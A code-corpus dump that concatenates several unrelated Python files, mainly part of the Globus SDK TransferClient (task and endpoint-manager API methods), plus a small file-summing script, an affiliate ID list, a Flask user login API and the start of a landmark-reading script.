log.error(f\"task_wait() timeout={timeout} is less than minimum of 1s\")\n raise exc.GlobusSDKUsageError(\n \"TransferClient.task_wait timeout has a minimum of 1\"\n )\n if polling_interval < 1:\n log.error(\n \"task_wait() polling_interval={} is less than minimum of 1s\".format(\n polling_interval\n )\n )\n raise exc.GlobusSDKUsageError(\n \"TransferClient.task_wait polling_interval has a minimum of 1\"\n )\n\n # ensure that we always wait at least one interval, even if the timeout\n # is shorter than the polling interval, by reducing the interval to the\n # timeout if it is larger\n polling_interval = min(timeout, polling_interval)\n\n # helper for readability\n def timed_out(waited_time):\n return waited_time > timeout\n\n waited_time = 0\n # doing this as a while-True loop actually makes it simpler than doing\n # while not timed_out(waited_time) because of the end condition\n while True:\n # get task, check if status != ACTIVE\n task = self.get_task(task_id_s)\n status = task[\"status\"]\n if status != \"ACTIVE\":\n log.debug(\n \"task_wait(task_id={}) terminated with status={}\".format(\n task_id_s, status\n )\n )\n return True\n\n # make sure to check if we timed out before sleeping again, so we\n # don't sleep an extra polling_interval\n waited_time += polling_interval\n if timed_out(waited_time):\n log.debug(f\"task_wait(task_id={task_id_s}) timed out\")\n return False\n\n log.debug(f\"task_wait(task_id={task_id_s}) waiting {polling_interval}s\")\n time.sleep(polling_interval)\n # unreachable -- end of task_wait\n\n def task_pause_info(\n self, task_id: ID_PARAM_TYPE, query_params: Optional[Dict[str, Any]] = None\n ) -> response.GlobusHTTPResponse:\n \"\"\"\n ``GET /task//pause_info``\n\n :rtype: :class:`TransferResponse\n `\n\n **External Documentation**\n\n See\n `Get task pause info \\\n `_\n in the REST documentation for details.\n \"\"\"\n task_id_s = utils.safe_stringify(task_id)\n log.info(f\"TransferClient.task_pause_info({task_id_s}, ...)\")\n resource_path = self.qjoin_path(\"task\", task_id_s, \"pause_info\")\n return self.get(resource_path, query_params=query_params)\n\n @paging.has_paginator(paging.MarkerPaginator, items_key=\"DATA\")\n def task_successful_transfers(\n self, task_id: ID_PARAM_TYPE, query_params: Optional[Dict[str, Any]] = None\n ) -> IterableTransferResponse:\n \"\"\"\n Get the successful file transfers for a completed Task.\n\n .. note::\n\n Only files that were actually transferred are included. This does\n not include directories, files that were checked but skipped as\n part of a sync transfer, or files which were skipped due to\n skip_source_errors being set on the task.\n\n ``GET /task//successful_transfers``\n\n :param task_id: The ID of the task to inspect.\n :type task_id: str\n :param query_params: Any additional parameters will be passed through\n as query params.\n :type query_params: dict, optional\n :rtype: :class:`IterableTransferResponse\n `\n\n **Examples**\n\n Fetch all transferred files for a task and print some basic info:\n\n >>> tc = TransferClient(...)\n >>> task_id = ...\n >>> for info in tc.task_successful_transfers(task_id):\n >>> print(\"{} -> {}\".format(\n >>> info[\"source_path\"], info[\"destination_path\"]))\n\n **External Documentation**\n\n See\n `Get Task Successful Transfers\\\n `_\n in the REST documentation for details.\n \"\"\"\n task_id_s = utils.safe_stringify(task_id)\n log.info(f\"TransferClient.task_successful_transfers({task_id_s}, ...)\")\n path = self.qjoin_path(\"task\", task_id_s, \"successful_transfers\")\n return IterableTransferResponse(self.get(path, query_params=query_params))\n\n @paging.has_paginator(paging.MarkerPaginator, items_key=\"DATA\")\n def task_skipped_errors(\n self, task_id: ID_PARAM_TYPE, query_params: Optional[Dict[str, Any]] = None\n ) -> IterableTransferResponse:\n \"\"\"\n Get path and error information for all paths that were skipped due\n to skip_source_errors being set on a completed transfer Task.\n\n ``GET /task//skipped_errors``\n\n :param task_id: The ID of the task to inspect.\n :type task_id: str\n :param query_params: Any additional parameters will be passed through\n as query params.\n :type query_params: dict, optional\n :rtype: :class:`IterableTransferResponse\n `\n\n **Examples**\n\n Fetch all skipped errors for a task and print some basic info:\n\n >>> tc = TransferClient(...)\n >>> task_id = ...\n >>> for info in tc.task_skipped_errors(task_id):\n >>> print(\"{} -> {}\".format(\n >>> info[\"error_code\"], info[\"source_path\"]))\n\n **External Documentation**\n\n See\n `Get Task Skipped Errors\\\n `_\n in the REST documentation for details.\n \"\"\"\n task_id_s = utils.safe_stringify(task_id)\n log.info(\n \"TransferClient.endpoint_manager_task_skipped_errors(%s, ...)\", task_id_s\n )\n resource_path = self.qjoin_path(\"task\", task_id_s, \"skipped_errors\")\n return IterableTransferResponse(\n self.get(resource_path, query_params=query_params)\n )\n\n #\n # advanced endpoint management (requires endpoint manager role)\n #\n\n def endpoint_manager_monitored_endpoints(\n self, query_params: Optional[Dict[str, Any]] = None\n ) -> IterableTransferResponse:\n \"\"\"\n Get endpoints the current user is a monitor or manager on.\n\n ``GET endpoint_manager/monitored_endpoints``\n\n :rtype: iterable of :class:`GlobusResponse\n `\n\n See\n `Get monitored endpoints \\\n `_\n in the REST documentation for details.\n \"\"\"\n log.info(f\"TransferClient.endpoint_manager_monitored_endpoints({query_params})\")\n path = self.qjoin_path(\"endpoint_manager\", \"monitored_endpoints\")\n return IterableTransferResponse(self.get(path, query_params=query_params))\n\n def endpoint_manager_hosted_endpoint_list(\n self, endpoint_id: ID_PARAM_TYPE, query_params: Optional[Dict[str, Any]] = None\n ) -> IterableTransferResponse:\n \"\"\"\n Get shared endpoints hosted on the given endpoint.\n\n ``GET /endpoint_manager/endpoint//hosted_endpoint_list``\n\n :rtype: iterable of :class:`GlobusResponse\n `\n\n See\n `Get hosted endpoint list \\\n `_\n in the REST documentation for details.\n \"\"\"\n endpoint_id_s = utils.safe_stringify(endpoint_id)\n log.info(\n f\"TransferClient.endpoint_manager_hosted_endpoint_list({endpoint_id_s})\"\n )\n path = self.qjoin_path(\n \"endpoint_manager\", \"endpoint\", endpoint_id_s, \"hosted_endpoint_list\"\n )\n return IterableTransferResponse(self.get(path, query_params=query_params))\n\n def endpoint_manager_get_endpoint(\n self, endpoint_id: ID_PARAM_TYPE, query_params: Optional[Dict[str, Any]] = None\n ) -> response.GlobusHTTPResponse:\n \"\"\"\n Get endpoint details as an admin.\n\n ``GET /endpoint_manager/endpoint/``\n\n :rtype: :class:`TransferResponse\n `\n\n **External Documentation**\n\n See\n `Get endpoint as admin \\\n `_\n in the REST documentation for details.\n \"\"\"\n endpoint_id_s = utils.safe_stringify(endpoint_id)\n log.info(f\"TransferClient.endpoint_manager_get_endpoint({endpoint_id_s})\")\n path = self.qjoin_path(\"endpoint_manager\", \"endpoint\", endpoint_id_s)\n return self.get(path, query_params=query_params)\n\n def endpoint_manager_acl_list(\n self, endpoint_id: ID_PARAM_TYPE, query_params: Optional[Dict[str, Any]] = None\n ) -> IterableTransferResponse:\n \"\"\"\n Get a list of access control rules on specified endpoint as an admin.\n\n ``GET endpoint_manager/endpoint//access_list``\n\n :rtype: :class:`IterableTransferResponse\n `\n\n **External Documentation**\n\n See\n `Get endpoint access list as admin \\\n `_\n in the REST documentation for details.\n \"\"\"\n endpoint_id_s = utils.safe_stringify(endpoint_id)\n log.info(\n f\"TransferClient.endpoint_manager_endpoint_acl_list({endpoint_id_s}, ...)\"\n )\n path = self.qjoin_path(\n \"endpoint_manager\", \"endpoint\", endpoint_id_s, \"access_list\"\n )\n return IterableTransferResponse(self.get(path, query_params=query_params))\n\n #\n # endpoint manager task methods\n #\n\n @paging.has_paginator(paging.LastKeyPaginator, items_key=\"DATA\")\n def endpoint_manager_task_list(\n self, query_params: Optional[Dict[str, Any]] = None\n ) -> IterableTransferResponse:\n r\"\"\"\n Get a list of tasks visible via ``activity_monitor`` role, as opposed\n to tasks owned by the current user.\n\n ``GET endpoint_manager/task_list``\n\n :param query_params: Any additional parameters will be passed through\n as query params.\n :type query_params: dict, optional\n :rtype: :class:`IterableTransferResponse\n `\n\n **Filters**\n\n The following filters are supported (passed as keyword arguments in\n ``query_params``). For any query that doesn’t specify a filter_status\n that is a subset of (\"ACTIVE\", \"INACTIVE\"), at least one of\n filter_task_id or filter_endpoint is required.\n\n ====================== ================ ========================\n Query Parameter Filter Type Description\n ====================== ================ ========================\n filter_status equality list |filter_status|\n filter_task_id equality list |filter_task_id|\n filter_owner_id equality |filter_owner_id|\n filter_endpoint equality |filter_endpoint|\n filter_is_paused boolean equality |filter_is_paused|\n filter_completion_time datetime range |filter_completion_time|\n filter_min_faults int |filter_min_faults|\n filter_local_user equality |filter_local_user|\n ====================== ================ ========================\n\n .. |filter_status| replace::\n Comma separated list of task statuses. Return only tasks with any of the\n specified statuses. Note that in-progress tasks will have status \"ACTIVE\" or\n \"INACTIVE\", and completed tasks will have status \"SUCCEEDED\" or \"FAILED\".\n\n .. |filter_task_id| replace::\n Comma separated list of task_ids, limit 50. Return only tasks with any of\n the specified ids. If any of the specified tasks do not involve an endpoint\n the user has an appropriate role for, a ``PermissionDenied`` error will be\n returned. This filter can't be combined with any other filter. If another\n filter is passed, a ``BadRequest`` will be returned.\n\n .. |filter_owner_id| replace::\n A Globus Auth identity id. Limit results to tasks submitted by the specified\n identity, or linked to the specified identity, at submit time. Returns\n ``UserNotFound`` if the identity does not exist or has never used the Globus\n Transfer service. If no tasks were submitted by this user to an endpoint the\n current user has an appropriate role on, an empty result set will be\n returned. Unless filtering for running tasks (i.e. ``filter_status`` is a\n subset of (\"ACTIVE\", \"INACTIVE\"), ``filter_endpoint`` is required when using\n ``filter_owner_id``.\n\n .. |filter_endpoint| replace::\n Single endpoint id or canonical name. Using canonical name is deprecated.\n Return only tasks with a matching source or destination endpoint or matching\n source or destination host endpoint.\n\n .. |filter_is_paused| replace::\n Return only tasks with the specified ``is_paused`` value. Requires that\n ``filter_status`` is also passed and contains a subset of \"ACTIVE\" and\n \"INACTIVE\". Completed tasks always have ``is_paused`` equal to \"false\" and\n filtering on their paused state is not useful and not supported. Note that\n pausing is an async operation, and after a pause rule is inserted it will\n take time before the is_paused flag is set on all affected tasks. Tasks\n paused by id will have the ``is_paused`` flag set immediately.\n\n .. |filter_completion_time| replace::\n Start and end date-times separated by a comma. Each datetime should be\n specified as a string in ISO 8601 format: ``YYYY-MM-DDTHH:MM:SS``, where the\n \"T\" separating date and time is literal, with optional \\+/-HH:MM for\n timezone. If no timezone is specified, UTC is assumed, or a trailing \"Z\" can\n be specified to make UTC explicit. A space can be used between the date and\n time instead of a space. A blank string may be used for either the start or\n end (but not both) to indicate no limit on that side. Returns only complete\n tasks with ``completion_time`` in the specified range. If the end date is\n blank, it will also include all active tasks, since they will complete some\n time in the future.\n\n .. |filter_min_faults| replace::\n Minimum number of cumulative faults, inclusive. Return only tasks with\n ``faults >= N``, where N is the filter value. Use ``filter_min_faults=1`` to\n find all tasks with at least one fault. Note that many errors are not fatal\n and the task may still be successful even if ``faults >= 1``.\n\n .. |filter_local_user| replace::\n A valid username for the target system running the endpoint, as a utf8\n encoded string. Requires that ``filter_endpoint`` is also set. Return only\n tasks that have successfully fetched the local user from the endpoint, and\n match the values of ``filter_endpoint`` and ``filter_local_user`` on the\n source or on the destination.\n\n **Examples**\n\n Fetch some tasks and print some basic info:\n\n >>> tc = TransferClient(...)\n >>> for task in tc.endpoint_manager_task_list(filter_status=\"ACTIVE\"):\n >>> print(\"Task({}): {} -> {}\\n was submitted by\\n {}\".format(\n >>> task[\"task_id\"], task[\"source_endpoint\"],\n >>> task[\"destination_endpoint\"], task[\"owner_string\"]))\n\n Do that same operation on *all* tasks visible via ``activity_monitor``\n status:\n\n >>> tc = TransferClient(...)\n >>> for page in tc.paginated.endpoint_manager_task_list(\n >>> filter_status=\"ACTIVE\"\n >>> ):\n >>> for task in page:\n >>> print(\"Task({}): {} -> {}\\n was submitted by\\n {}\".format(\n >>> task[\"task_id\"], task[\"source_endpoint\"],\n >>> task[\"destination_endpoint\"), task[\"owner_string\"])\n\n **External Documentation**\n\n See\n `Advanced Endpoint Management: Get tasks \\\n `_\n in the REST documentation for details.\n \"\"\"\n log.info(\"TransferClient.endpoint_manager_task_list(...)\")\n path = self.qjoin_path(\"endpoint_manager\", \"task_list\")\n return IterableTransferResponse(self.get(path, query_params=query_params))\n\n def endpoint_manager_get_task(\n self, task_id: ID_PARAM_TYPE, query_params: Optional[Dict[str, Any]] = None\n ):\n \"\"\"\n Get task info as an admin. Requires activity monitor effective role on\n the destination endpoint of the task.\n\n ``GET /endpoint_manager/task/``\n\n :rtype: :class:`TransferResponse\n `\n\n **External Documentation**\n\n See\n `Get task as admin \\\n `_\n in the REST documentation for details.\n \"\"\"\n task_id_s = utils.safe_stringify(task_id)\n log.info(f\"TransferClient.endpoint_manager_get_task({task_id_s}, ...)\")\n path = self.qjoin_path(\"endpoint_manager\", \"task\", task_id_s)\n return self.get(path, query_params=query_params)\n\n @paging.has_paginator(\n paging.LimitOffsetTotalPaginator,\n items_key=\"DATA\",\n get_page_size=_get_page_size,\n max_total_results=1000,\n page_size=1000,\n )\n def endpoint_manager_task_event_list(\n self,\n task_id: ID_PARAM_TYPE,\n limit: Optional[int] = None,\n offset: Optional[int] = None,\n query_params: Optional[Dict[str, Any]] = None,\n ) -> IterableTransferResponse:\n \"\"\"\n List events (for example, faults and errors) for a given task as an\n admin. Requires activity monitor effective role on the destination\n endpoint of the task.\n\n ``GET /task//event_list``\n\n :param task_id: The ID of the task to inspect.\n :type task_id: str\n :param limit: limit the number of results\n :type limit: int, optional\n :param offset: offset used in paging\n :param query_params: Any additional parameters will be passed through\n as query params.\n :type query_params: dict, optional\n :rtype: :class:`IterableTransferResponse\n `\n\n **External Documentation**\n\n See\n `Get task events as admin \\\n `_\n in the REST documentation for details.\n \"\"\"\n task_id_s = utils.safe_stringify(task_id)\n log.info(f\"TransferClient.endpoint_manager_task_event_list({task_id_s}, ...)\")\n path = self.qjoin_path(\"endpoint_manager\", \"task\", task_id_s, \"event_list\")\n if query_params is None:\n query_params = {}\n if limit is not None:\n query_params[\"limit\"] = limit\n if offset is not None:\n query_params[\"offset\"] = offset\n return IterableTransferResponse(self.get(path, query_params=query_params))\n\n def endpoint_manager_task_pause_info(\n self, task_id: ID_PARAM_TYPE, query_params: Optional[Dict[str, Any]] = None\n ) -> response.GlobusHTTPResponse:\n \"\"\"\n Get details about why a task is paused as an admin. Requires activity\n monitor effective role on the destination endpoint of the task.\n\n ``GET /endpoint_manager/task//pause_info``\n\n :rtype: :class:`TransferResponse\n `\n\n **External Documentation**\n\n See\n `Get task pause info as admin \\\n `_\n in the REST documentation for details.\n \"\"\"\n task_id_s = utils.safe_stringify(task_id)\n log.info(f\"TransferClient.endpoint_manager_task_pause_info({task_id_s}, ...)\")\n path = self.qjoin_path(\"endpoint_manager\", \"task\", task_id_s, \"pause_info\")\n return self.get(path, query_params=query_params)\n\n @paging.has_paginator(paging.MarkerPaginator, items_key=\"DATA\")\n def endpoint_manager_task_successful_transfers(\n self, task_id: ID_PARAM_TYPE, query_params: Optional[Dict[str, Any]] = None\n ) -> IterableTransferResponse:\n \"\"\"\n Get the successful file transfers for a completed Task as an admin.\n\n ``GET /endpoint_manager/task//successful_transfers``\n\n :param task_id: The ID of the task to inspect.\n :type task_id: str\n :param query_params: Any additional parameters will be passed through\n as query params.\n :type query_params: dict, optional\n :rtype: :class:`IterableTransferResponse\n `\n\n **External Documentation**\n\n See\n `Get task successful transfers as admin\\\n `_\n in the REST documentation for details.\n \"\"\"\n task_id_s = utils.safe_stringify(task_id)\n log.info(\n \"TransferClient.endpoint_manager_task_successful_transfers(%s, ...)\",\n task_id_s,\n )\n path = self.qjoin_path(\n \"endpoint_manager\", \"task\", task_id_s, \"successful_transfers\"\n )\n return IterableTransferResponse(self.get(path, query_params=query_params))\n\n def endpoint_manager_task_skipped_errors(\n self, task_id: ID_PARAM_TYPE, query_params: Optional[Dict[str, Any]] = None\n ) -> IterableTransferResponse:\n \"\"\"\n Get skipped errors for a completed Task as an admin.\n\n ``GET /endpoint_manager/task//skipped_errors``\n\n :param task_id: The ID of the task to inspect.\n :type task_id: str\n :param query_params: Any additional parameters will be passed through\n as query params.\n :type query_params: dict, optional\n :rtype: :class:`IterableTransferResponse\n `\n\n **External Documentation**\n\n See\n `Get task skipped errors as admin\\\n `_\n in the REST documentation for details.\n \"\"\"\n task_id_s = utils.safe_stringify(task_id)\n log.info(\n f\"TransferClient.endpoint_manager_task_skipped_errors({task_id_s}, ...)\"\n )\n path = self.qjoin_path(\"endpoint_manager\", \"task\", task_id_s, \"skipped_errors\")\n return IterableTransferResponse(self.get(path, query_params=query_params))\n\n def endpoint_manager_cancel_tasks(\n self,\n task_ids: Iterable[ID_PARAM_TYPE],\n message,\n query_params: Optional[Dict[str, Any]] = None,\n ) -> response.GlobusHTTPResponse:\n \"\"\"\n Cancel a list of tasks as an admin. Requires activity manager effective\n role on the task(s) source or destination endpoint(s).\n\n ``POST /endpoint_manager/admin_cancel``\n\n :param task_ids: List of task ids to cancel.\n :type task_ids: iterable of str\n :param message: Message given to all users who's tasks have been canceled.\n :type message: str\n :param query_params: Any additional parameters will be passed through\n as query params.\n :type query_params: dict, optional\n :rtype: :class:`TransferResponse\n `\n\n **External Documentation**\n\n See\n `Cancel tasks as admin \\\n `_\n in the REST documentation for details.\n \"\"\"\n str_task_ids = [utils.safe_stringify(i) for i in task_ids]\n message = utils.safe_stringify(message)\n log.info(\n f\"TransferClient.endpoint_manager_cancel_tasks({str_task_ids}, {message})\"\n )\n data = {\"message\": utils.safe_stringify(message), \"task_id_list\": str_task_ids}\n path = self.qjoin_path(\"endpoint_manager\", \"admin_cancel\")\n return self.post(path, data=data, query_params=query_params)\n\n def endpoint_manager_cancel_status(\n self, admin_cancel_id, query_params: Optional[Dict[str, Any]] = None\n ) -> response.GlobusHTTPResponse:\n \"\"\"\n Get the status of an an admin cancel (result of\n endpoint_manager_cancel_tasks).\n\n ``GET /endpoint_manager/admin_cancel/``\n\n :param admin_cancel_id: The ID of the the cancel job to inspect.\n :type admin_cancel_id: str\n :param query_params: Any additional parameters will be passed through\n as query params.\n :type query_params: dict, optional\n :rtype: :class:`TransferResponse\n `\n\n **External Documentation**\n\n See\n `Get cancel status by id \\\n `_\n in the REST documentation for details.\n \"\"\"\n log.info(f\"TransferClient.endpoint_manager_cancel_status({admin_cancel_id})\")\n path = self.qjoin_path(\"endpoint_manager\", \"admin_cancel\", admin_cancel_id)\n return self.get(path, query_params=query_params)\n\n def endpoint_manager_pause_tasks(\n self,\n task_ids: Iterable[ID_PARAM_TYPE],\n message,\n query_params: Optional[Dict[str, Any]] = None,\n ) -> response.GlobusHTTPResponse:\n \"\"\"\n Pause a list of tasks as an admin. Requires activity manager effective\n role on the task(s) source or destination endpoint(s).\n\n ``POST /endpoint_manager/admin_pause``\n\n :param task_ids: List of task ids to pause.\n :type task_ids: iterable of str\n :param message: Message given to all users who's tasks have been paused.\n :type message: str\n :param query_params: Any additional parameters will be passed through\n as query params.\n :type query_params: dict, optional\n :rtype: :class:`TransferResponse\n `\n\n **External Documentation**\n\n See\n `Pause tasks as admin \\\n `_\n in the REST documentation for details.\n \"\"\"\n str_task_ids = [utils.safe_stringify(i) for i in task_ids]\n message = utils.safe_stringify(message)\n log.info(\n f\"TransferClient.endpoint_manager_pause_tasks({str_task_ids}, {message})\"\n )\n data = {\n \"message\": utils.safe_stringify(message),\n \"task_id_list\": str_task_ids,\n }\n path = self.qjoin_path(\"endpoint_manager\", \"admin_pause\")\n return self.post(path, data=data, query_params=query_params)\n\n def endpoint_manager_resume_tasks(\n self,\n task_ids: Iterable[ID_PARAM_TYPE],\n query_params: Optional[Dict[str, Any]] = None,\n ) -> response.GlobusHTTPResponse:\n \"\"\"\n Resume a list of tasks as an admin. Requires activity manager effective\n role on the task(s) source or destination endpoint(s).\n\n ``POST /endpoint_manager/admin_resume``\n\n :param task_ids: List of task ids to resume.\n :type task_ids: iterable of str\n :param query_params: Any additional parameters will be passed through\n as query params.\n :type query_params: dict, optional\n :rtype: :class:`TransferResponse\n `\n\n **External Documentation**\n\n See\n `Resume tasks as admin \\\n `_\n in the REST documentation for details.\n \"\"\"\n str_task_ids = [utils.safe_stringify(i) for i in task_ids]\n log.info(f\"TransferClient.endpoint_manager_resume_tasks({str_task_ids})\")\n data = {\"task_id_list\": str_task_ids}\n path = self.qjoin_path(\"endpoint_manager\", \"admin_resume\")\n return self.post(path, data=data, query_params=query_params)\n\n #\n # endpoint manager pause rule methods\n #\n\n def endpoint_manager_pause_rule_list(\n self,\n filter_endpoint: Optional[ID_PARAM_TYPE] = None,\n query_params: Optional[Dict[str, Any]] = None,\n ) -> IterableTransferResponse:\n \"\"\"\n Get a list of pause rules on endpoints that the current user has the\n activity monitor effective role on.\n\n ``GET /endpoint_manager/pause_rule_list``\n\n :param filter_endpoint: An endpoint ID. Limit results to rules on endpoints\n hosted by this endpoint. Must be activity monitor on this endpoint, not just\n the hosted endpoints.\n :type filter_endpoint: str\n :param query_params: Any additional parameters will be passed through\n as query params.\n :type query_params: dict, optional\n :rtype: :class:`IterableTransferResponse\n `\n\n **External Documentation**\n\n See\n `Get pause rules \\\n `_\n in the REST documentation for details.\n \"\"\"\n log.info(\"TransferClient.endpoint_manager_pause_rule_list(...)\")\n path = self.qjoin_path(\"endpoint_manager\", \"pause_rule_list\")\n if query_params is None:\n query_params = {}\n if filter_endpoint is not None:\n query_params[\"filter_endpoint\"] = utils.safe_stringify(filter_endpoint)\n return IterableTransferResponse(self.get(path, query_params=query_params))\n\n def endpoint_manager_create_pause_rule(self, data) -> response.GlobusHTTPResponse:\n \"\"\"\n Create a new pause rule. Requires the activity manager effective role\n on the endpoint defined in the rule.\n\n ``POST /endpoint_manager/pause_rule``\n\n :rtype: :class:`TransferResponse\n `\n\n **Examples**\n\n >>> tc = globus_sdk.TransferClient(...)\n >>> rule_data = {\n >>> \"DATA_TYPE\": \"pause_rule\",\n >>> \"message\": \"Message to users explaining why tasks are paused\",\n >>> \"endpoint_id\": \"339abc22-aab3-4b45-bb56-8d40535bfd80\",\n >>> \"identity_id\": None, # affect all users on endpoint\n >>> \"start_time\": None # start now\n >>> }\n >>> create_result = tc.endpoint_manager_create_pause_rule(ep_data)\n >>> rule_id = create_result[\"id\"]\n\n **External Documentation**\n\n See\n `Create pause rule \\\n `_\n in the REST documentation for details.\n \"\"\"\n log.info(\"TransferClient.endpoint_manager_create_pause_rule(...)\")\n path = self.qjoin_path(\"endpoint_manager\", \"pause_rule\")\n return self.post(path, data=data)\n\n def endpoint_manager_get_pause_rule(\n self, pause_rule_id, query_params: Optional[Dict[str, Any]] = None\n ) -> response.GlobusHTTPResponse:\n \"\"\"\n Get an existing pause rule by ID. Requires the activity manager\n effective role on the endpoint defined in the rule.\n\n ``GET /endpoint_manager/pause_rule/``\n\n :param pause_rule_id: ID of pause rule to get.\n :type pause_rule_id: str\n :param query_params: Any additional parameters will be passed through\n as query params.\n :type query_params: dict, optional\n :rtype: :class:`TransferResponse\n `\n\n **External Documentation**\n\n See\n `Get pause rule \\\n `_\n in the REST documentation for details.\n \"\"\"\n pause_rule_id = utils.safe_stringify(pause_rule_id)\n log.info(f\"TransferClient.endpoint_manager_get_pause_rule({pause_rule_id})\")\n path = self.qjoin_path(\"endpoint_manager\", \"pause_rule\", pause_rule_id)\n return self.get(path, query_params=query_params)\n\n def endpoint_manager_update_pause_rule(\n self, pause_rule_id, data\n ) -> response.GlobusHTTPResponse:\n \"\"\"\n Update an existing pause rule by ID. Requires the activity manager\n effective role on the endpoint defined in the rule.\n Note that non update-able fields in data will be ignored.\n\n ``PUT /endpoint_manager/pause_rule/``\n\n :rtype: :class:`TransferResponse\n `\n\n **Examples**\n\n >>> tc = globus_sdk.TransferClient(...)\n >>> rule_data = {\n >>> \"message\": \"Update to pause, reads are now allowed.\",\n >>> \"pause_ls\": False,\n >>> \"pause_task_transfer_read\": False\n >>> }\n >>> update_result = tc.endpoint_manager_update_pause_rule(ep_data)\n\n **External Documentation**\n\n See\n `Update pause rule \\\n `_\n in the REST documentation for details.\n \"\"\"\n pause_rule_id = utils.safe_stringify(pause_rule_id)\n log.info(f\"TransferClient.endpoint_manager_update_pause_rule({pause_rule_id})\")\n path = self.qjoin_path(\"endpoint_manager\", \"pause_rule\", pause_rule_id)\n return self.put(path, data=data)\n\n def endpoint_manager_delete_pause_rule(\n self, pause_rule_id, query_params: Optional[Dict[str, Any]] = None\n ) -> response.GlobusHTTPResponse:\n \"\"\"\n Delete an existing pause rule by ID. Requires the user to see the\n \"editible\" field of the rule as True. Any tasks affected by this rule\n will no longer be once it is deleted.\n\n ``DELETE /endpoint_manager/pause_rule/``\n\n :param pause_rule_id: The ID of the pause rule to delete.\n :type pause_rule_id: str\n :param query_params: Any additional parameters will be passed through\n as query params.\n :type query_params: dict, optional\n :rtype: :class:`TransferResponse\n `\n\n **External Documentation**\n\n See\n `Delete pause rule \\\n `_\n in the REST documentation for details.\n \"\"\"\n pause_rule_id = utils.safe_stringify(pause_rule_id)\n log.info(f\"TransferClient.endpoint_manager_delete_pause_rule({pause_rule_id})\")\n path = self.qjoin_path(\"endpoint_manager\", \"pause_rule\", pause_rule_id)\n return self.delete(path, query_params=query_params)\n","sub_path":"src/globus_sdk/services/transfer/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":94056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"171403152","text":"path = input(\"Введите путь к файлу input.txt: \")\n\nwith open('\\\\'.join([path, \"input.txt\"])) as numbers_file:\n numbers_text = numbers_file.read()\n\nsum = 0\nnumbers = numbers_text.split()\nfor number in numbers:\n sum = sum + int(number)\n\nwith open('\\\\'.join([path, \"output.txt\"]), \"w\") as result_file:\n result_file.write(str(sum))\n","sub_path":"lect_05/code/AniaNikolaieva - math and files/main_optimized_1.py","file_name":"main_optimized_1.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"543670326","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.4 (62061)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-i686/egg/boo_box/affiliates.py\n# Compiled at: 2009-06-12 09:57:11\namazon = 'amazonid'\namazon_uk = 'amazonukid'\namazon_jp = 'amazonjpid'\namazon_fr = 'amazonfrid'\namazon_de = 'amazondeid'\namericanas = 'americanasid'\nbuscape = 'buscapeid'\nebay = 'ebayid'\njacotei = 'jacoteiid'\nmercadolivre = 'mercadolivreid'\nsubmarino = 'submarinoid'\namericanas = 'americanasid'","sub_path":"pycfiles/boo_box-0.3.7-py2.4/affiliates.py","file_name":"affiliates.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"315187982","text":"from flask_restful import Resource, reqparse\nfrom models.usuario import UserModel\nfrom werkzeug.security import safe_str_cmp\nfrom flask_jwt_extended import create_access_token, jwt_required, get_raw_jwt\nfrom blacklist import BLACKLIST\nimport traceback\n\n\n#global variables\nattr = reqparse.RequestParser()\nattr.add_argument('login', type=str, required=True,\n help='The field login cannot be left blank')\nattr.add_argument('senha', type=str, required=True,\n help=\"The senha cannot be left blank\")\nattr.add_argument('email', type=str)\nattr.add_argument('ativado', type=bool)\n\n\nclass User(Resource):\n # /usuarios/{user_id}\n def get(self, user_id): # -----------------Get por ID\n user = UserModel.find_user(user_id)\n if user:\n return(user.json())\n return {'message': 'Uusuário not found'}, 404\n\n @jwt_required\n def delete(self, user_id):\n user = UserModel.find_user(user_id)\n if user:\n try:\n user.delete_user()\n except:\n return {'message': 'An internal error ocurred trying to delete usuário.'}, 500\n return {'message': 'Usuário deleted'}\n return {'message': 'Usuário not found.'}, 404\n\n\nclass UserRegister(Resource):\n # /cadastro\n def post(self):\n\n dados = attr.parse_args()\n if not dados.get('email') or dados.get('email') is None:\n return{\"message\": \"The field 'email' cannot be left blank.\"}, 404\n\n if UserModel.find_by_email(dados['email']):\n return {\"message\": \"The email '{}' already exists\".format(dados['email'])}, 400\n\n if UserModel.find_by_login(dados['login']):\n return {\"message\": \"The login '{}' already exists\".format(dados['login'])}, 400\n\n user = UserModel(**dados)\n user.ativado = False\n try:\n user.save_user()\n user.send_confirmation_email()\n except:\n user.delete_user()\n traceback.prin_exc()\n return {'message', 'An internal server error has ocurred.'}, 500\n return{'message': 'User created successfully!!!!!!!!!'}, 201\n\n\nclass UserLogin(Resource):\n\n @classmethod\n def post(cls):\n dados = attr.parse_args()\n\n user = UserModel.find_by_login(dados['login'])\n if user and safe_str_cmp(user.senha, dados['senha']):\n if user.ativado:\n token_de_acesso = create_access_token(identity=user.user_id)\n return {'access_token': token_de_acesso}, 200\n return{'message': 'User not confirmed.'}, 400\n return {'message': 'The username or password is incorrect'}, 401\n\n\nclass UserLogout(Resource):\n @jwt_required\n def post(self):\n jwt_id = get_raw_jwt()['jti'] # Token identifier\n BLACKLIST.add(jwt_id)\n return {'message': 'Logged out successfully!!!'}, 200\n\n\nclass UserConfirm(Resource):\n # Raiz_do_site/confirmacao/{user_id}\n @classmethod\n def get(cls, user_id):\n user = UserModel.find_user(user_id)\n\n if not user:\n return{\"message\": \"User id '{}' not found\".format(user_id)}, 404\n user.ativado = True\n user.save_user()\n return{\"message\": \"User id'{}' confirmed successfully.\".format(user_id)}, 200\n","sub_path":"resources/usuario.py","file_name":"usuario.py","file_ext":"py","file_size_in_byte":3308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"546239341","text":"import os\nimport json\nimport numpy as np\nfrom mtcnn.mtcnn import MTCNN\nimport cv2\nfrom file_count import get_extension\n\ndata_path = '/home/skliang/Downloads/training_data'\nstandard_size = (128, 128)\n\ndef read_points(file_name):\n f = open(os.path.join(data_path, file_name))\n points = []\n for line in f:\n if 'version' in line or 'points' in line or '{' in line or '}' in line:\n continue\n x, y = line.strip().split(' ')\n points.append((float(x), float(y)))\n\n 